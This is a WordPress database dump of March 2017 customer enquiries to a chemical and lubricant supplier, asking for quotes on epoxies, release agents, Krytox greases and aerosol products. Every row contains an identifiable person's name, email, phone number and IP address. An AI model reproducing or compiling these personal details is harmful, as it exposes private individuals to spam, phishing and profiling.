INSERT INTO `wp_enquiry_detail_new` VALUES (695, 'Kelvin Pang', 'kelvin@nabelin.com.my', 'Dear Sir,\n\nWe are a Chemical Trading Company in Malaysia. Our customer is looking for your product QUIK-FREEZE MS-242N, 14 oz(397gm). Kindly please let us know how to order this product from you.\n\nBest Regards.\n\nKelvin Pang\n', '+6012-3905598', 'QUIK-FREEZE MS-242N, 14 oz(397gm)', '113.210.105.149', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1726";s:5:"title";s:24:"Antistatic Quik-Freeze®";s:5:"price";s:0:"";s:5:"quant";s:1:"5";s:3:"img";s:88:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/quik-freeze-anti-static.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-23 03:08:11', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (696, 'Stefani Belles', 'stefani@metplas.com', 'I need a price and lead-time on 815C. ', '724295-1900', 'PRICE AND LEAD-TIME ', '208.248.109.121', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"910";s:5:"title";s:12:"EPON™ 815C";s:5:"price";s:0:"";s:5:"quant";s:1:"3";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-815C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-23 15:24:56', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (697, 'Stefani Belles', 'stefani@metplas.com', 'I need a price and lead-time asap.', '724295-1900', 'PRICE AND LEAD-TIME', '208.248.109.121', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1185";s:5:"title";s:15:"EPIKURE™ 3234";s:5:"price";s:0:"";s:5:"quant";s:1:"3";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3234.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-23 15:25:49', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (698, 'Nancy ', 'nancy.phoenix@gemssensors.com', 'Would like a price quote on 12 cans Aero-Duster', '860793-4332', 'MS-222N', '50.233.42.114', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-23 15:35:24', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (699, 'Chris', 'christopher.alba@siemens.com', 'Please send me a quote for 5 cans and 10 cans of MS-122AD', '704421-8343', 'RFQ', '104.129.204.86', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"5";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-23 16:41:00', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (700, 'judy newton', 'judy.newton@certifiedmfg.com', 'Does the MS-470 come in "N"?\nI have a part number that is listed as\nMS-470N\nCan we buy just one can? Or is there a min buy?', '', 'MS-470', '170.249.187.66', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"735";s:5:"title";s:7:"MS-470C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-470C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-23 18:16:34', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (701, 'Mousumi Dhara', 'mod2011@med.cornell.edu', 'Cat # GPL 103', '212327-7170', 'Price ', '140.251.84.92', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"438";s:5:"title";s:7:"GPL 103";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease3.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-23 19:26:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (702, 'Douglas Young', 'douglas.young@datc.edu', 'We have used samples of MS-122SE and MS-122AD and were very pleased with it. I would like a quote for getting some. We are a college teaching composites. We do wet lay-ups with polyester and epoxy resins and prepreg with epoxy resin systems', '801593-2500', 'need quote', '205.122.234.201', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2771";s:5:"title";s:9:"MS-122SEL";s:5:"price";s:0:"";s:5:"quant";s:1:"5";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_495450013.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-23 21:59:47', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (703, 'Eric Newman', 'Eric.Newman@CBS.com', 'Need Quote on Air Duster Cans. I think our account is still active as you are still in our system. Please confirm. \n CBS Television City, 7800 Beverly Blvd, LA CA 90036', '818575-2347', 'Cobra Duster Air Duster  MS-222N', '170.20.132.250', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1851";s:5:"title";s:14:"Cobra® Duster";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/COBRA-BRUSH.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-24 03:36:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (704, 'Barrie Quinn', 'barrie.quinn@lucite.com', 'Hello,\n\nwould it be possible to advise on price and lead time for 2Kg Vazo 67.\n\nThanks.', '+441642447178', 'Vazo 67', '85.115.52.201', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"575";s:5:"title";s:7:"VAZO 67";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:83:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/VAZO-67-composites.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-24 10:08:05', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (705, 'Jeff Lippert', 'jlippert@nkmfgtech.com', 'I am looking for pricing on this grease.  in the past we bough .5kg  tub', '616248-3200', 'Krytox XHT BDX', '152.160.190.58', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"697";s:5:"title";s:7:"XHT-BDX";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_105938183.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-24 12:50:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (706, 'Zayyan Chowdhury', 'zchowdhury@mschem.com', 'test', '', 'test', '24.63.154.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"789";s:5:"title";s:7:"GPL 205";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-24 13:09:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (707, 'Frank Middleton', 'frjmiddleton@yahoo.com', 'DO YOU SHIP Individual gallons?  If so, what is your unit prices?', '', 'Epoxy Prices', '67.1.177.78', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"903";s:5:"title";s:11:"EPON™ 813";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-813.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-24 14:06:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (708, 'Henry Pensiero', 'hpensiero@palmerohealth.com', 'We are dental wholesaler located in Connecticut.  We have an interest in knowing if the FluoroExtreme Dental lubricant is available as a private label offering.', '203377-6424', 'private label', '24.89.168.139', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"474";s:5:"title";s:30:"FluoroExtreme Dental Lubricant";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/DENTAL.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-24 14:07:45', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (709, 'Jade Kopf', 'jkopf@gacg.com', 'I am interested in purchasing today one gallon of Epson 828 and one gallon of Epikure 3223 DETA. Please let me know as soon as possible if this is in stock to purchase today, along with certificates of conformance. Thanks!', '912401-0335', 'Epon 828 &amp; Epikure 3223', '50.244.80.73', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1183";s:5:"title";s:15:"EPIKURE™ 3223";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3223.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-24 17:34:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (710, 'trent  miler', 'ttmiller87@gmail.com', 'Need Quote on the MS-465C', '812718-9329', '', '69.174.141.104', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"733";s:5:"title";s:7:"MS-465C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-465C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-24 18:57:02', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (711, 'Liat Rosenfeld', 'liat.rosenfeld@sjsu.edu', 'I would like to get a quote for Krytox 157 FSL. ', '', '', '68.65.166.113', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"960";s:5:"title";s:7:"157 FSL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-24 19:38:43', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (712, 'Tyler Godsman', 'tyler.godsman@jpbg.ca', 'I was hoping to purchase 12 of these.  Please let me know how to proceed.', '587432-7775', 'Shipping to Edmotnon - Alberta - Canada', '204.191.60.61', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-24 20:09:58', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (713, 'William Spurgeon', 'william.a.spurgeon.civ@mail.mil', 'I need a small quantity of this - less than 500 grams.Also an MSDS. Do you take credit cards? ', '410306-1006', 'EPIKURE W', '128.63.170.13', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1059";s:5:"title";s:12:"EPIKURE™ W";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-W-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-24 20:35:51', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (714, 'chris Whitemore', 'chris.whitemore@utas.utc.com', 'I need to know if this is compatible with Titanium?  Does this react or damage titanium in any way?\nThanks ', '951351-5535', '', '192.249.47.212', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1719";s:5:"title";s:21:"Quik-Freeze® MS-242N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/quik-freeze.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-24 21:25:57', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (715, 'Ken Ebhodaghe', 'kenjehi@yahoo.com', 'Sir/Madam,\n\nKindly send us quote for 0.5kg package of KRYTOX GPL 226 Grease including shipping cost to Lagos, Nigeria if KRYTOX  GPL 226 Grease has replaced KRYTOX FG 34 Grease. If not please send for KRYTOX FG 34 Grease.\n\nThanks.\n\nKen Ebhodaghe\nFor: Nekton Integral Services Company Ltd.', '+2348187214008', 'REQUEST FOR QUOTE', '41.190.3.190', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"850";s:5:"title";s:7:"GPL 226";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_92739160.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-25 06:43:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (716, 'Kevin Mack', 'kevinmackk@gmail.com', 'Hi there I would like a price quote on Epikure 3234 and Epon 828.  Also could you inform me of the sizes that are available, and do you ship to puerto rico and if so how much does it cost? Thanks for your time. I would be using this material back turquoise cabochons ', '939238-6179', 'price quote ', '74.213.80.250', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1185";s:5:"title";s:15:"EPIKURE™ 3234";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3234.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-25 13:59:06', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (717, 'david gordon', 'dg@drdavidgordon.com', 'referred to you from parkell dental products as release agent for dental moulds.\n\nthank you', '512708-8900', 'teflon release agent', '172.2.66.54', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1679";s:5:"title";s:9:"MS-122ADL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:93:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122adl-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-27 11:49:49', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (718, 'Scott Weil', 'sweil@Hi-TechCompressor.com', 'Please provide pricing for Vertrel MCA in aerosol and 50lb pail.', '215547-8800', 'Pricing for Vertrel MCA', '96.245.51.30', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1263";s:5:"title";s:11:"Vertrel MCA";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-solvent.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-27 15:07:54', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (719, 'KRISTIN STEVENS', 'KRISTIN.STEVENS@GLIDEWELLDENTAL.COM', 'NEED PRICING AND WOULD LIKE TO ORDER 10 OF MS-122AD', '', 'QUOTE PLEASE', '12.197.210.42', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:2:"10";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-27 18:09:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (720, 'pat', 'pat@hyperloop-one.com', 'can you please provide costs for this product. thx!', '213905-8361', 'Cost and availability', '104.243.115.35', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1705";s:5:"title";s:12:"MS-580N/582N";s:5:"price";s:0:"";s:5:"quant";s:3:"100";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-580N.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-27 18:31:36', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (721, 'juha nieminen', 'juha@hyperloop-one.com', 'I would need 24 cans.', '213608-6253', '', '67.201.11.195', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1705";s:5:"title";s:12:"MS-580N/582N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-580N.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-27 18:38:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (722, 'RamKrishna', 'hcctradeing@gmail.com', 'Dear sir/madam, \nWe are from Harini Commercial Corporation, looking for a product that was in your website. 01.KRYTOX NRT 8904   --  100Kgs \n\nSo kindly send me the Quotation and catalog for the product. Waiting for your response.\n\nRegards, \nRamKrishna, \nHarini Commercial Corporation, \nVizag -17, \nAndhra Pradesh. \nCell:9573186367\n\n', '+919573186367', 'URGENT REQUIREMENT', '123.201.210.145', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"878";s:5:"title";s:8:"NRT 8904";s:5:"price";s:0:"";s:5:"quant";s:3:"100";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_315050906.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-28 10:32:41', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (723, 'Steve Sommers', 'Steven.Sommers@Aramcoservices.com', 'Please provide a quote for the MS-580N/582N.', '702326-0567', 'RFQ MS-580N/582N', '64.215.209.1', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1705";s:5:"title";s:12:"MS-580N/582N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-580N.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-28 11:39:10', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (724, 'Odis Kerbow', 'odkerbow@systronix-inc.com', 'Is it available in aerosol cans?', '281851-1951', 'Price &amp; delivery', '75.148.217.241', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"302";s:5:"title";s:8:"MS-122SE";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:83:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-122SE-Aerospace.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-28 18:59:55', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (725, 'Randy Mullen', 'mullens15@yahoo.com', 'the crack is in the water jacket, about 4 inchs long . will this  907 work on a cast iron block? thank you. Randy', '417414-8406', 'marine engine block crack', '173.17.72.43', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-28 20:23:30', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (726, 'Tara Randall', 'randallt@dynacare.ca', 'Hello,\n\nDo you have an MSDS sheet for the Aero-Duster; MS-222N?\nThanks', '', '', '159.18.246.250', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-29 12:41:41', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (727, 'Bt Lee', 'bt@sagesdesk.com', 'Krytox XP 2A3 1oz tube\nKrytox XP 2A7 1oz tube\n\nIs it in stock ?\nI want to buy it.\nPlease, let me know it by email.', '+8210-6344-6432', 'Krytox XP 2A3 2oz tube', '121.140.53.90', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1011";s:5:"title";s:6:"XP 2A3";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-bearing-grease4.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-29 16:28:30', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (728, 'Xiao Huang', 'huangx@caltech.edu', 'Hi there, we want to buy some Krytox 157 FSL for research. What\'s the price for 4oz Needle Nose Bottle? Thank you.', '949542-2414', 'price', '131.215.220.161', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"960";s:5:"title";s:7:"157 FSL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-29 17:15:45', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (729, 'Monica Marcial', 'monicam@malonescnc.com', 'Please quote:\nMS-122XD', '918786-7313', 'PTFE Release Agent', '12.203.177.162', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1681";s:5:"title";s:8:"MS-122XD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122xd-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-29 17:44:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (730, 'Mike Bellmore', 'Mkbellmore@gmail.com', 'Looking for a price quote on how much this product costs. ', '906295-1455', '', '24.213.35.4', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-29 18:56:51', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (731, 'Kristi Garcia', 'kgarcia@janteq.com', 'Hi \nI\'m looking for a case of this.  can you please quote', '949215-2603', 'Quote ', '98.189.41.132', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1719";s:5:"title";s:21:"Quik-Freeze® MS-242N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/quik-freeze.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-29 21:47:55', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (732, 'Ronald Dinning', 'ronbdinning@gmail.com', 'I am a dentist looking to use this as a separating agent for PVS impressions.  Small quantity would be fine.  \nThank you', '805637-7080', '', '98.173.213.19', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1681";s:5:"title";s:8:"MS-122XD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122xd-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-29 22:46:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (733, 'Yuri Verbruggen', 'y.verbruggen@composites.nl', 'Dear sir, madam,\n\nI would like to receive a ROM quote for a large number of MS-122AVL Aerosols.\n\nWith best regards,\n\nYuri', '', 'ROM Quote MS-122AVL', '87.195.100.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2769";s:5:"title";s:9:"MS-122AVL";s:5:"price";s:0:"";s:5:"quant";s:4:"1000";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_389699368.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-30 10:21:06', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (734, 'Mark Seger', 'mark.seger@flexterracorp.com', 'Hello,\nI am a senior scientist at Flexterra, Inc. located in Skokie, IL.  We are interested in a quote for 100 g of VAZO 52 [(2-2′-Azobis(2,4-dimethylvaleronitrile)] as described on your website.\n\nThank you,\nMark\n', '224534-3077', 'VAZO 52 100 g Quote', '50.194.86.105', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"568";s:5:"title";s:7:"VAZO 52";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:79:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-pca-oil.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-30 14:53:51', '', NULL, '', '', '', NULL, '', ''); 
